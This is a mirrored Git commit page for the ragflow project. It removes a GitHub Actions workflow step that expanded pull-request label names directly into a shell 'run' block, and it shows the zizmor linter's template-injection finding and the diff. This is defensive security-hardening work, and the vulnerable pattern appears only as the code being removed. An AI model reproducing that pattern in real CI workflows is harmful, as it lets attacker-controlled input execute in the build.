AI/ragflow
1
0
Fork 0
mirror of https://git.mirrors.martin98.com/https://github.com/infiniflow/ragflow.git synced 2025-08-12 18:49:02 +08:00
Code Issues Packages Projects Releases Wiki Activity

ci: remove may expand into attacker-controllable code (#5407)

Browse Source 
### What problem does this PR solve?

_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._

This patch remove dangerous code that `may expand into
attacker-controllable code`

more:

```cli
error[template-injection]: code injection via template expansion
  --> /Users/hyi/prs/ragflow/.github/workflows/tests.yml:35:9
   |
35 |         - name: Show PR labels
   |           ^^^^^^^^^^^^^^^^^^^^ this step
36 |           run: |
   |  _________^
37 | |           echo "Workflow triggered by ${{ github.event_name }}"
38 | |           if [[ ${{ github.event_name }} == 'pull_request' ]]; then
39 | |             echo "PR labels: ${{ join(github.event.pull_request.labels.*.name, ', ') }}"
40 | |           fi
   | |____________^ github.event.pull_request.labels.*.name may expand into attacker-controllable code
   |
   = note: audit confidence → High

```

using zizmor to check 
https://woodruffw.github.io/zizmor/

but this patch do not fix them all, just remove high audit confidence →
High

### Type of change

- [ ] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [x] Other (please describe):

---------

Signed-off-by: yihong0618 <zouzou0208@gmail.com>
Co-authored-by: Zhichang Yu <yuzhichang@gmail.com>
This commit is contained in:
yihong 2025-02-27 10:20:04 +08:00 committed by GitHub
parent fa76974e24
commit eaa1adb3b2
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 1 additions and 4 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

5
.github/workflows/tests.yml vendored
View File

@ -32,12 +32,9 @@ jobs:
# https://github.com/hmarr/debug-action # https://github.com/hmarr/debug-action
#- uses: hmarr/debug-action@v2 #- uses: hmarr/debug-action@v2
- name: Show PR labels - name: Show who triggered this workflow
run: | run: |
echo "Workflow triggered by ${{ github.event_name }}" echo "Workflow triggered by ${{ github.event_name }}"
if [[ ${{ github.event_name }} == 'pull_request' ]]; then
echo "PR labels: ${{ join(github.event.pull_request.labels.*.name, ', ') }}"
fi
- name: Ensure workspace ownership - name: Ensure workspace ownership
run: echo "chown -R $USER $GITHUB_WORKSPACE" && sudo chown -R $USER $GITHUB_WORKSPACE run: echo "chown -R $USER $GITHUB_WORKSPACE" && sudo chown -R $USER $GITHUB_WORKSPACE